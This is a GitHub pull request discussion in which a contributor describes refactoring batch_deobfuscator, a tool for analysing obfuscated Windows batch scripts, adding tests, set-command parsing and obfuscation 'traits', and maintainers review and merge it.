batch_deobfuscator Major refactoring

Hi, I think it could be of interest to merge back the improvement that I've done on the project. As you will see, I modified quite a lot of things. It would be hard to point to just a few things, as I think I modified a large enough percentage of the project. I also added some experimental features that you may not want, so I don't know how we'll be able to merge if you don't want those. I'll go over a few things that I've done, that I think is worthy:

Added multiple tests. For fun, you could download my two tests file and that would be a way to check what was improved by my changes. I generated the tests by running the commands on a VM, but if you disagree with the expected result of a test, I would be very interested to know.
The get_commands function now try to beautify the IF and FOR statement, to split them into multiple lines for easier interpretation. An example of this advantage is to have this statement IF "A"=="A" (set A=1) else (set A=0) get a valid value for the variable A. If I recall, in the original code, the variable A would be equal to 1) else (set A=0). Now, it will be equal to 0. The beautifying process will split this previous statement in four lines, and since they are parsed in sequence, A will get the value 1, then 0, then move on to the next lines of the script.
I modified the get_value to handle special characters in variable name, better handle slicing and handle replacement (with possible asterisk wildcard).
I created a function to handle set command and in it, a state machine. I believe it is greatly improved. There is quite a lot of use-case where it did a difference and running the tests on the previous version and this one is probably the best way to see it. I interpret the options at the moment, but decided against doing an eval() on the content of the set value when /a is used. I am just surrounding it with parenthesis.
I skip any line that starts with REM, as we don't want to interpret them if they contain code. I got some cases where they contain invalid code and batch_deobfuscator wasn't liking it.
I changed interpret_command to be recursive on CALL, instead of allowing it to be in front of a command. That way there could be any number.
Parsing the curl command options, I'll explain later why
Lots of modifications to the normalized_command function, with recursivity when getting a variable value.
Lastly, the one you may not be interested into : A traits dictionary.

The Traits dictionary is a structure that I want to use to store curious/interesting features of the script that is being analyzed. Currently, it doesn't have much, but it could be improved over time. You can see that one of my trait is being populated in the interpret_curl function, where I will store the location of the exact line that did the download, the source, and the destination. The second place where I populate two other traits is at the end of the normalized_command. It fills in the start_with_var and var_used traits, which is a boolean for the first one, and an integer for the second. The goal is to flag lines that are starting with a variable, a possible sign of obfuscation, and the number of variable used on a single line. If the number is very high, it is another possible sign of obfuscation. You can see a clear example of those two in the test_unittest.py -> test_single_quote_var_name_rewrite_2.

I did not not modify the main function, and barely modified the two interpret_logical_line* functions I believe there was a typo and a missing clear() call. I personally don't use those, and made my own. I could try to merge my interpret_logical_line if there is interest. Both of the ones in the file currently are ending up printing to console as the _str calls the non _str for child executions. In my interpret_local_line, on a higher level, I also keep track of a few things which allow me to generate two or three other traits.

Take your time to look into it, and if you have any question or want to discuss about it, I am more than happy to chat with you.

Jul 22 '22 12:07 gdesmar

Thank you very much for the PR. However, it may take a while for me to review the PR and merge. Please bear with me.

@wmetcalf can you also take a look?

Jul 23 '22 21:07 DissectMalware

Hi, I refactored my code to merge all my traits into this library.

Detecting if the script is a one-liner, even if there is one or more empty lines in the file.
Detecting if the one-liner is expanded in too many lines, then detecting a complex one-liner. The number of line is configurable.
Detection of LOLBAS usage.
Detection of command grouping, when command splitting is different before and after normalization.

I also added my replacement functions for the different interpret_logical_line functions, a combination of the analyze and the analyze_logical_line functions. I do recursive calls to analyze_logical_line to handle command grouping. A big difference from the interpret_logical_line that are already present is that I generate the extracted children and deobfuscated script as distinct files. On top of the previous batch children I also try to search for powershell children. The logic regarding poweshell children is not perfect yet, and I have examples where I want to improve it. It may end up in the interpret_command function with the other command interpreters.

Unless you want to use my analyze function somewhere, this last commit should have no impact on the code that was already there.

Thanks for reviewing. I know that the script was first and foremost doing variable management for replacement and resolution, and that my additions may have change the focus of the project. There may be a way to create another library to separate the analytic part of my additions, if you'd prefer to concentrate on variables.

Aug 12 '22 17:08 gdesmar

I finally had some time to go through all of this and play with it a bit. Looks good to me! I say ship it!

Oct 20 '22 13:10 wmetcalf

Thank you @gdesmar for your PR. Thank you @wmetcalf for the review.

The PR is merged.

Oct 24 '22 18:10 DissectMalware